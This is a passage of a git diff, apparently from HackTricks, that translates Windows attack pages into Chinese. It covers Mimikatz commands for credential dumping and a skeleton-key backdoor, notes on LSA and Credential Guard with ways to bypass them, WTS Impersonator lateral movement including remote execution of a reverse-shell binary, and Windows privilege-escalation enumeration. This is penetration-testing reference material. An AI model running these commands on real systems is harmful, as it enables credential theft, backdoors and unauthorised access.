+- `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
 
-  - `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
+- **LSADUMP::Trust**：检索信任认证信息。
+- `mimikatz "lsadump::trust" exit`
 
-- **LSADUMP::Trust**: Retrieve trust authentication information.
-  - `mimikatz "lsadump::trust" exit`
+### 杂项
 
-### Miscellaneous
+- **MISC::Skeleton**：在 DC 的 LSASS 中注入后门。
+- `mimikatz "privilege::debug" "misc::skeleton" exit`
 
-- **MISC::Skeleton**: Inject a backdoor into LSASS on a DC.
-  - `mimikatz "privilege::debug" "misc::skeleton" exit`
+### 权限提升
 
-### Privilege Escalation
+- **PRIVILEGE::Backup**：获取备份权限。
 
-- **PRIVILEGE::Backup**: Acquire backup rights.
+- `mimikatz "privilege::backup" exit`
 
-  - `mimikatz "privilege::backup" exit`
+- **PRIVILEGE::Debug**：获取调试权限。
+- `mimikatz "privilege::debug" exit`
 
-- **PRIVILEGE::Debug**: Obtain debug privileges.
-  - `mimikatz "privilege::debug" exit`
+### 凭证转储
 
-### Credential Dumping
+- **SEKURLSA::LogonPasswords**：显示已登录用户的凭证。
 
-- **SEKURLSA::LogonPasswords**: Show credentials for logged-on users.
+- `mimikatz "sekurlsa::logonpasswords" exit`
 
-  - `mimikatz "sekurlsa::logonpasswords" exit`
+- **SEKURLSA::Tickets**：从内存中提取 Kerberos 票证。
+- `mimikatz "sekurlsa::tickets /export" exit`
 
-- **SEKURLSA::Tickets**: Extract Kerberos tickets from memory.
-  - `mimikatz "sekurlsa::tickets /export" exit`
+### Sid 和 Token 操作
 
-### Sid and Token Manipulation
+- **SID::add/modify**：更改 SID 和 SIDHistory。
 
-- **SID::add/modify**: Change SID and SIDHistory.
+- 添加：`mimikatz "sid::add /user:targetUser /sid:newSid" exit`
+- 修改：_原始上下文中未提供修改的具体命令。_
 
-  - Add: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
-  - Modify: _No specific command for modify in original context._
+- **TOKEN::Elevate**：模拟令牌。
+- `mimikatz "token::elevate /domainadmin" exit`
 
-- **TOKEN::Elevate**: Impersonate tokens.
-  - `mimikatz "token::elevate /domainadmin" exit`
+### 终端服务
 
-### Terminal Services
+- **TS::MultiRDP**：允许多个 RDP 会话。
 
-- **TS::MultiRDP**: Allow multiple RDP sessions.
+- `mimikatz "ts::multirdp" exit`
 
-  - `mimikatz "ts::multirdp" exit`
-
-- **TS::Sessions**: List TS/RDP sessions.
-  - _No specific command provided for TS::Sessions in original context._
+- **TS::Sessions**：列出 TS/RDP 会话。
+- _原始上下文中未提供 TS::Sessions 的具体命令。_
 
 ### Vault
 
-- Extract passwords from Windows Vault.
-  - `mimikatz "vault::cred /patch" exit`
+- 从 Windows Vault 中提取密码。
+- `mimikatz "vault::cred /patch" exit`
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+深入了解 **移动安全**，请访问 8kSec 学院。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/stealing-credentials/credentials-protections.md b/src/windows-hardening/stealing-credentials/credentials-protections.md
index 4ab516c04..9f76e8b61 100644
--- a/src/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/src/windows-hardening/stealing-credentials/credentials-protections.md
@@ -6,93 +6,83 @@
 
 ## WDigest
 
-The [WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) protocol, introduced with Windows XP, is designed for authentication via the HTTP Protocol and is **enabled by default on Windows XP through Windows 8.0 and Windows Server 2003 to Windows Server 2012**. This default setting results in **plain-text password storage in LSASS** (Local Security Authority Subsystem Service). An attacker can use Mimikatz to **extract these credentials** by executing:
-
+[WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) 协议于 Windows XP 中引入，旨在通过 HTTP 协议进行身份验证，并且在 **Windows XP 到 Windows 8.0 以及 Windows Server 2003 到 Windows Server 2012 中默认启用**。此默认设置导致 **在 LSASS 中以明文存储密码**（本地安全授权子系统服务）。攻击者可以使用 Mimikatz **提取这些凭据**，通过执行：
 ```bash
 sekurlsa::wdigest
 ```
-
-To **toggle this feature off or on**, the _**UseLogonCredential**_ and _**Negotiate**_ registry keys within _**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_ must be set to "1". If these keys are **absent or set to "0"**, WDigest is **disabled**:
-
+要**启用或禁用此功能**，必须将_HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest_中的_**UseLogonCredential**_和_**Negotiate**_注册表项设置为"1"。如果这些键**缺失或设置为"0"**，则WDigest**被禁用**：
 ```bash
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
 ```
+## LSA 保护
 
-## LSA Protection
-
-Starting with **Windows 8.1**, Microsoft enhanced the security of LSA to **block unauthorized memory reads or code injections by untrusted processes**. This enhancement hinders the typical functioning of commands like `mimikatz.exe sekurlsa:logonpasswords`. To **enable this enhanced protection**, the _**RunAsPPL**_ value in _**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ should be adjusted to 1:
-
+从 **Windows 8.1** 开始，Microsoft 增强了 LSA 的安全性，以 **阻止不受信任进程的未经授权的内存读取或代码注入**。这一增强阻碍了像 `mimikatz.exe sekurlsa:logonpasswords` 这样的命令的典型功能。要 **启用这种增强保护**，应将 _**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ 中的 _**RunAsPPL**_ 值调整为 1：
 ```
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
 ```
+### 绕过
 
-### Bypass
-
-It is possible to bypass this protection using Mimikatz driver mimidrv.sys:
+可以使用 Mimikatz 驱动程序 mimidrv.sys 绕过此保护：
 
 ![](../../images/mimidrv.png)
 
-## Credential Guard
+## 凭据保护
 
-**Credential Guard**, a feature exclusive to **Windows 10 (Enterprise and Education editions)**, enhances the security of machine credentials using **Virtual Secure Mode (VSM)** and **Virtualization Based Security (VBS)**. It leverages CPU virtualization extensions to isolate key processes within a protected memory space, away from the main operating system's reach. This isolation ensures that even the kernel cannot access the memory in VSM, effectively safeguarding credentials from attacks like **pass-the-hash**. The **Local Security Authority (LSA)** operates within this secure environment as a trustlet, while the **LSASS** process in the main OS acts merely as a communicator with the VSM's LSA.
+**凭据保护**是 **Windows 10（企业版和教育版）** 独有的功能，通过 **虚拟安全模式（VSM）** 和 **基于虚拟化的安全性（VBS）** 增强机器凭据的安全性。它利用 CPU 虚拟化扩展将关键进程隔离在受保护的内存空间中，远离主操作系统的触及。这种隔离确保即使是内核也无法访问 VSM 中的内存，有效保护凭据免受 **pass-the-hash** 等攻击。**本地安全机构（LSA）** 在这个安全环境中作为信任组件运行，而主操作系统中的 **LSASS** 进程仅充当与 VSM 的 LSA 的通信者。
 
-By default, **Credential Guard** is not active and requires manual activation within an organization. It's critical for enhancing security against tools like **Mimikatz**, which are hindered in their ability to extract credentials. However, vulnerabilities can still be exploited through the addition of custom **Security Support Providers (SSP)** to capture credentials in clear text during login attempts.
-
-To verify **Credential Guard**'s activation status, the registry key _**LsaCfgFlags**_ under _**HKLM\System\CurrentControlSet\Control\LSA**_ can be inspected. A value of "**1**" indicates activation with **UEFI lock**, "**2**" without lock, and "**0**" denotes it is not enabled. This registry check, while a strong indicator, is not the sole step for enabling Credential Guard. Detailed guidance and a PowerShell script for enabling this feature are available online.
+默认情况下，**凭据保护** 并未激活，需要在组织内手动激活。它对于增强抵御像 **Mimikatz** 这样的工具的安全性至关重要，这些工具在提取凭据的能力上受到限制。然而，仍然可以通过添加自定义 **安全支持提供程序（SSP）** 来利用漏洞，在登录尝试期间捕获明文凭据。
 
+要验证 **凭据保护** 的激活状态，可以检查注册表项 _**LsaCfgFlags**_，位于 _**HKLM\System\CurrentControlSet\Control\LSA**_ 下。值为 "**1**" 表示激活并带有 **UEFI 锁**，"**2**" 表示没有锁，"**0**" 表示未启用。此注册表检查虽然是一个强有力的指示，但并不是启用凭据保护的唯一步骤。有关启用此功能的详细指导和 PowerShell 脚本可在线获取。
 ```powershell
 reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 ```
+为了全面了解和启用 **Credential Guard** 在 Windows 10 中的说明，以及在 **Windows 11 Enterprise 和 Education (版本 22H2)** 兼容系统中的自动激活，请访问 [Microsoft's documentation](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage)。
 
-For a comprehensive understanding and instructions on enabling **Credential Guard** in Windows 10 and its automatic activation in compatible systems of **Windows 11 Enterprise and Education (version 22H2)**, visit [Microsoft's documentation](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
+有关实施自定义 SSP 进行凭据捕获的更多详细信息，请参阅 [this guide](../active-directory-methodology/custom-ssp.md)。
 
-Further details on implementing custom SSPs for credential capture are provided in [this guide](../active-directory-methodology/custom-ssp.md).
+## RDP RestrictedAdmin 模式
 
-## RDP RestrictedAdmin Mode
+**Windows 8.1 和 Windows Server 2012 R2** 引入了几个新的安全功能，包括 _**RDP 的 Restricted Admin 模式**_。此模式旨在通过减轻与 [**pass the hash**](https://blog.ahasayen.com/pass-the-hash/) 攻击相关的风险来增强安全性。
 
-**Windows 8.1 and Windows Server 2012 R2** introduced several new security features, including the _**Restricted Admin mode for RDP**_. This mode was designed to enhance security by mitigating the risks associated with [**pass the hash**](https://blog.ahasayen.com/pass-the-hash/) attacks.
+传统上，通过 RDP 连接到远程计算机时，您的凭据会存储在目标机器上。这带来了显著的安全风险，尤其是在使用具有提升权限的帐户时。然而，随着 _**Restricted Admin 模式**_ 的引入，这一风险大大降低。
 
-Traditionally, when connecting to a remote computer via RDP, your credentials are stored on the target machine. This poses a significant security risk, especially when using accounts with elevated privileges. However, with the introduction of _**Restricted Admin mode**_, this risk is substantially reduced.
+当使用命令 **mstsc.exe /RestrictedAdmin** 启动 RDP 连接时，对远程计算机的身份验证是在不存储您的凭据的情况下进行的。这种方法确保在发生恶意软件感染或恶意用户获得远程服务器访问权限的情况下，您的凭据不会被泄露，因为它们并未存储在服务器上。
 
-When initiating an RDP connection using the command **mstsc.exe /RestrictedAdmin**, authentication to the remote computer is performed without storing your credentials on it. This approach ensures that, in the event of a malware infection or if a malicious user gains access to the remote server, your credentials are not compromised, as they are not stored on the server.
+需要注意的是，在 **Restricted Admin 模式** 下，从 RDP 会话访问网络资源的尝试将不会使用您的个人凭据；相反，使用的是 **机器的身份**。
 
-It's important to note that in **Restricted Admin mode**, attempts to access network resources from the RDP session will not use your personal credentials; instead, the **machine's identity** is used.
-
-This feature marks a significant step forward in securing remote desktop connections and protecting sensitive information from being exposed in case of a security breach.
+此功能标志着在保护远程桌面连接和敏感信息免受安全漏洞暴露方面的重要进展。
 
 ![](../../images/RAM.png)
 
-For more detailed information on visit [this resource](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
+有关更多详细信息，请访问 [this resource](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/)。
 
-## Cached Credentials
+## 缓存凭据
 
-Windows secures **domain credentials** through the **Local Security Authority (LSA)**, supporting logon processes with security protocols like **Kerberos** and **NTLM**. A key feature of Windows is its capability to cache the **last ten domain logins** to ensure users can still access their computers even if the **domain controller is offline**—a boon for laptop users often away from their company's network.
-
-The number of cached logins is adjustable via a specific **registry key or group policy**. To view or change this setting, the following command is utilized:
+Windows 通过 **本地安全机构 (LSA)** 保护 **域凭据**，支持使用 **Kerberos** 和 **NTLM** 等安全协议的登录过程。Windows 的一个关键特性是其能够缓存 **最后十个域登录**，以确保用户即使在 **域控制器离线** 时仍能访问他们的计算机——这对经常远离公司网络的笔记本电脑用户来说是一个福音。
 
+缓存登录的数量可以通过特定的 **注册表项或组策略** 进行调整。要查看或更改此设置，可以使用以下命令：
 ```bash
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
 ```
+访问这些缓存凭据的权限受到严格控制，只有 **SYSTEM** 账户拥有查看它们所需的权限。需要访问此信息的管理员必须以 SYSTEM 用户权限进行操作。凭据存储在：`HKEY_LOCAL_MACHINE\SECURITY\Cache`
 
-Access to these cached credentials is tightly controlled, with only the **SYSTEM** account having the necessary permissions to view them. Administrators needing to access this information must do so with SYSTEM user privileges. The credentials are stored at: `HKEY_LOCAL_MACHINE\SECURITY\Cache`
+**Mimikatz** 可以通过命令 `lsadump::cache` 提取这些缓存凭据。
 
-**Mimikatz** can be employed to extract these cached credentials using the command `lsadump::cache`.
+有关更多详细信息，原始 [source](http://juggernaut.wikidot.com/cached-credentials) 提供了全面的信息。
 
-For further details, the original [source](http://juggernaut.wikidot.com/cached-credentials) provides comprehensive information.
+## 受保护用户
 
-## Protected Users
+加入 **受保护用户组** 的成员为用户引入了几项安全增强措施，确保对凭据盗窃和滥用的更高保护级别：
 
-Membership in the **Protected Users group** introduces several security enhancements for users, ensuring higher levels of protection against credential theft and misuse:
+- **凭据委派 (CredSSP)**：即使 **允许委派默认凭据** 的组策略设置已启用，受保护用户的明文凭据也不会被缓存。
+- **Windows Digest**：从 **Windows 8.1 和 Windows Server 2012 R2** 开始，系统将不会缓存受保护用户的明文凭据，无论 Windows Digest 状态如何。
+- **NTLM**：系统不会缓存受保护用户的明文凭据或 NT 单向函数 (NTOWF)。
+- **Kerberos**：对于受保护用户，Kerberos 认证不会生成 **DES** 或 **RC4 密钥**，也不会缓存明文凭据或超出初始票证授予票证 (TGT) 获取的长期密钥。
+- **离线登录**：受保护用户在登录或解锁时不会创建缓存验证器，这意味着这些账户不支持离线登录。
 
-- **Credential Delegation (CredSSP)**: Even if the Group Policy setting for **Allow delegating default credentials** is enabled, plain text credentials of Protected Users will not be cached.
-- **Windows Digest**: Starting from **Windows 8.1 and Windows Server 2012 R2**, the system will not cache plain text credentials of Protected Users, regardless of the Windows Digest status.
-- **NTLM**: The system will not cache Protected Users' plain text credentials or NT one-way functions (NTOWF).
-- **Kerberos**: For Protected Users, Kerberos authentication will not generate **DES** or **RC4 keys**, nor will it cache plain text credentials or long-term keys beyond the initial Ticket-Granting Ticket (TGT) acquisition.
-- **Offline Sign-In**: Protected Users will not have a cached verifier created at sign-in or unlock, meaning offline sign-in is not supported for these accounts.
+这些保护措施在 **受保护用户组** 的成员登录设备时立即激活。这确保了关键安全措施到位，以防止各种凭据泄露方法。
 
-These protections are activated the moment a user, who is a member of the **Protected Users group**, signs into the device. This ensures that critical security measures are in place to safeguard against various methods of credential compromise.
-
-For more detailed information, consult the official [documentation](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group).
+有关更详细的信息，请查阅官方 [documentation](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)。
 
 **Table from** [**the docs**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)**.**
 
@@ -116,4 +106,3 @@ For more detailed information, consult the official [documentation](https://docs
 | Server Operators        | Server Operators         | Server Operators                                                              | Server Operators             |
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index 969b3c713..4026be267 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -1,51 +1,48 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The **WTS Impersonator** tool exploits the **"\\pipe\LSM_API_service"** RPC Named pipe to stealthily enumerate logged-in users and hijack their tokens, bypassing traditional Token Impersonation techniques. This approach facilitates seamless lateral movements within networks. The innovation behind this technique is credited to **Omri Baso, whose work is accessible on [GitHub](https://github.com/OmriBaso/WTSImpersonator)**.
+**WTS Impersonator** 工具利用 **"\\pipe\LSM_API_service"** RPC 命名管道，悄无声息地枚举已登录用户并劫持他们的令牌，绕过传统的令牌模拟技术。这种方法促进了网络内的无缝横向移动。这项技术的创新归功于 **Omri Baso，他的工作可以在 [GitHub](https://github.com/OmriBaso/WTSImpersonator) 上找到**。
 
-### Core Functionality
-
-The tool operates through a sequence of API calls:
+### 核心功能
 
+该工具通过一系列 API 调用进行操作：
 ```powershell
 WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
 ```
+### 关键模块和用法
 
-### Key Modules and Usage
+- **枚举用户**：使用该工具可以进行本地和远程用户枚举，使用适用于两种情况的命令：
 
-- **Enumerating Users**: Local and remote user enumeration is possible with the tool, using commands for either scenario:
+- 本地：
+```powershell
+.\WTSImpersonator.exe -m enum
+```
+- 远程，通过指定IP地址或主机名：
+```powershell
+.\WTSImpersonator.exe -m enum -s 192.168.40.131
+```
 
-  - Locally:
-    ```powershell
-    .\WTSImpersonator.exe -m enum
-    ```
-  - Remotely, by specifying an IP address or hostname:
-    ```powershell
-    .\WTSImpersonator.exe -m enum -s 192.168.40.131
-    ```
+- **执行命令**：`exec`和`exec-remote`模块需要**服务**上下文才能工作。本地执行只需WTSImpersonator可执行文件和一个命令：
 
-- **Executing Commands**: The `exec` and `exec-remote` modules require a **Service** context to function. Local execution simply needs the WTSImpersonator executable and a command:
+- 本地命令执行示例：
+```powershell
+.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
+```
+- PsExec64.exe可用于获取服务上下文：
+```powershell
+.\PsExec64.exe -accepteula -s cmd.exe
+```
 
-  - Example for local command execution:
-    ```powershell
-    .\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
-    ```
-  - PsExec64.exe can be used to gain a service context:
-    ```powershell
-    .\PsExec64.exe -accepteula -s cmd.exe
-    ```
+- **远程命令执行**：涉及创建和安装一个远程服务，类似于PsExec.exe，允许以适当的权限执行。
 
-- **Remote Command Execution**: Involves creating and installing a service remotely similar to PsExec.exe, allowing execution with appropriate permissions.
+- 远程执行示例：
+```powershell
+.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
+```
 
-  - Example of remote execution:
-    ```powershell
-    .\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
-    ```
-
-- **User Hunting Module**: Targets specific users across multiple machines, executing code under their credentials. This is especially useful for targeting Domain Admins with local admin rights on several systems.
-  - Usage example:
-    ```powershell
-    .\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
-    ```
+- **用户猎杀模块**：针对多个机器上的特定用户，在他们的凭据下执行代码。这对于针对在多个系统上具有本地管理员权限的域管理员特别有用。
+- 用法示例：
+```powershell
+.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
+```
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index b8e4ebc83..e1d7ab1da 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1,14 +1,14 @@
-# Windows Local Privilege Escalation
+# Windows 本地权限提升
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **查找 Windows 本地权限提升向量的最佳工具:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
-## Initial Windows Theory
+## 初始 Windows 理论
 
-### Access Tokens
+### 访问令牌
 
-**If you don't know what are Windows Access Tokens, read the following page before continuing:**
+**如果你不知道什么是 Windows 访问令牌，请在继续之前阅读以下页面:**
 
 {{#ref}}
 access-tokens.md
@@ -16,34 +16,33 @@ access-tokens.md
 
 ### ACLs - DACLs/SACLs/ACEs
 
-**Check the following page for more info about ACLs - DACLs/SACLs/ACEs:**
+**有关 ACLs - DACLs/SACLs/ACEs 的更多信息，请查看以下页面:**
 
 {{#ref}}
 acls-dacls-sacls-aces.md
 {{#endref}}
 
-### Integrity Levels
+### 完整性级别
 
-**If you don't know what are integrity levels in Windows you should read the following page before continuing:**
+**如果你不知道 Windows 中的完整性级别是什么，你应该在继续之前阅读以下页面:**
 
 {{#ref}}
 integrity-levels.md
 {{#endref}}
 
-## Windows Security Controls
+## Windows 安全控制
 
-There are different things in Windows that could **prevent you from enumerating the system**, run executables or even **detect your activities**. You should **read** the following **page** and **enumerate** all these **defenses** **mechanisms** before starting the privilege escalation enumeration:
+Windows 中有不同的内容可能会 **阻止你枚举系统**、运行可执行文件或甚至 **检测你的活动**。你应该 **阅读** 以下 **页面** 并 **枚举** 所有这些 **防御** **机制**，然后再开始权限提升枚举:
 
 {{#ref}}
 ../authentication-credentials-uac-and-efs/
 {{#endref}}
 
-## System Info
+## 系统信息
 
-### Version info enumeration
-
-Check if the Windows version has any known vulnerability (check also the patches applied).
+### 版本信息枚举
 
+检查 Windows 版本是否存在已知漏洞（也检查已应用的补丁）。
 ```bash
 systeminfo
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
@@ -56,41 +55,37 @@ wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architec
 Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
 Get-Hotfix -description "Security update" #List only "Security Update" patches
 ```
+### 版本漏洞
 
-### Version Exploits
+这个 [site](https://msrc.microsoft.com/update-guide/vulnerability) 对于搜索有关 Microsoft 安全漏洞的详细信息非常有用。这个数据库包含超过 4,700 个安全漏洞，显示了 Windows 环境所呈现的 **巨大的攻击面**。
 
-This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the **massive attack surface** that a Windows environment presents.
-
-**On the system**
+**在系统上**
 
 - _post/windows/gather/enum_patches_
 - _post/multi/recon/local_exploit_suggester_
 - [_watson_](https://github.com/rasta-mouse/Watson)
-- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_
+- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas 已嵌入 watson)_
 
-**Locally with system information**
+**使用系统信息本地**
 
 - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
 - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng)
 
-**Github repos of exploits:**
+**漏洞的 Github 仓库：**
 
 - [https://github.com/nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub)
 - [https://github.com/abatchy17/WindowsExploits](https://github.com/abatchy17/WindowsExploits)
 - [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
 
-### Environment
-
-Any credential/Juicy info saved in the env variables?
+### 环境
 
+环境变量中保存了任何凭据/敏感信息吗？
 ```bash
 set
 dir env:
 Get-ChildItem Env: | ft Key,Value -AutoSize
 ```
-
-### PowerShell History
-
+### PowerShell 历史
 ```bash
 ConsoleHost_history #Find the PATH where is saved
 
@@ -100,11 +95,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx
 cat (Get-PSReadlineOption).HistorySavePath
 cat (Get-PSReadlineOption).HistorySavePath | sls passw
 ```
+### PowerShell 转录文件
 
-### PowerShell Transcript files
-
-You can learn how to turn this on in [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/)
-
+您可以在 [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) 学习如何启用此功能。
 ```bash
 #Check is enable in the registry
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
@@ -117,193 +110,164 @@ dir C:\Transcripts
 Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
 Stop-Transcript
 ```
+### PowerShell 模块日志记录
 
-### PowerShell Module Logging
-
-Details of PowerShell pipeline executions are recorded, encompassing executed commands, command invocations, and parts of scripts. However, complete execution details and output results might not be captured.
-
-To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for **"Module Logging"** instead of **"Powershell Transcription"**.
+PowerShell 管道执行的详细信息被记录，包括执行的命令、命令调用和脚本的部分内容。然而，完整的执行细节和输出结果可能不会被捕获。
 
+要启用此功能，请按照文档中“转录文件”部分的说明操作，选择 **"模块日志记录"** 而不是 **"Powershell 转录"**。
 ```bash
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
 reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
 reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
 ```
-
-To view the last 15 events from PowersShell logs you can execute:
-
+要查看 PowersShell 日志中的最后 15 个事件，可以执行：
 ```bash
 Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
 ```
+### PowerShell **脚本块日志记录**
 
-### PowerShell **Script Block Logging**
-
-A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and analyzing malicious behavior. By documenting all activity at the time of execution, detailed insights into the process are provided.
-
+脚本执行的完整活动和全部内容记录被捕获，确保每个代码块在运行时都有文档记录。此过程保留了每个活动的全面审计跟踪，对于取证和分析恶意行为非常有价值。通过在执行时记录所有活动，提供了对该过程的详细洞察。
 ```bash
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 ```
-
-Logging events for the Script Block can be located within the Windows Event Viewer at the path: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\
-To view the last 20 events you can use:
-
+记录脚本块的事件可以在Windows事件查看器中找到，路径为：**应用程序和服务日志 > Microsoft > Windows > PowerShell > 操作**。\
+要查看最后20个事件，可以使用：
 ```bash
 Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
 ```
-
-### Internet Settings
-
+### 互联网设置
 ```bash
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
 ```
-
-### Drives
-
+### 驱动器
 ```bash
 wmic logicaldisk get caption || fsutil fsinfo drives
 wmic logicaldisk get caption,description,providername
 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
-
 ## WSUS
 
-You can compromise the system if the updates are not requested using http**S** but http.
-
-You start by checking if the network uses a non-SSL WSUS update by running the following:
+如果更新不是通过 http**S** 而是通过 http 请求的，您可以危害系统。
 
+您可以通过运行以下命令检查网络是否使用非 SSL WSUS 更新：
 ```
 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
 ```
-
-If you get a reply such as:
-
+如果您收到以下回复：
 ```bash
 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
-      WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
+WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
 ```
+如果 `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` 等于 `1`。
 
-And if `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` is equals to `1`.
+那么，**它是可利用的。** 如果最后一个注册表等于 0，则 WSUS 条目将被忽略。
 
-Then, **it is exploitable.** If the last registry is equals to 0, then, the WSUS entry will be ignored.
+为了利用这些漏洞，您可以使用工具如：[Wsuxploit](https://github.com/pimps/wsuxploit)，[pyWSUS ](https://github.com/GoSecure/pywsus) - 这些是 MiTM 武器化的利用脚本，用于将“假”更新注入非 SSL WSUS 流量中。
 
-In orther to exploit this vulnerabilities you can use tools like: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus)- These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.
-
-Read the research here:
+在这里阅读研究：
 
 {% file src="../../images/CTX_WSUSpect_White_Paper (1).pdf" %}
 
 **WSUS CVE-2020-1013**
 
-[**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\
-Basically, this is the flaw that this bug exploits:
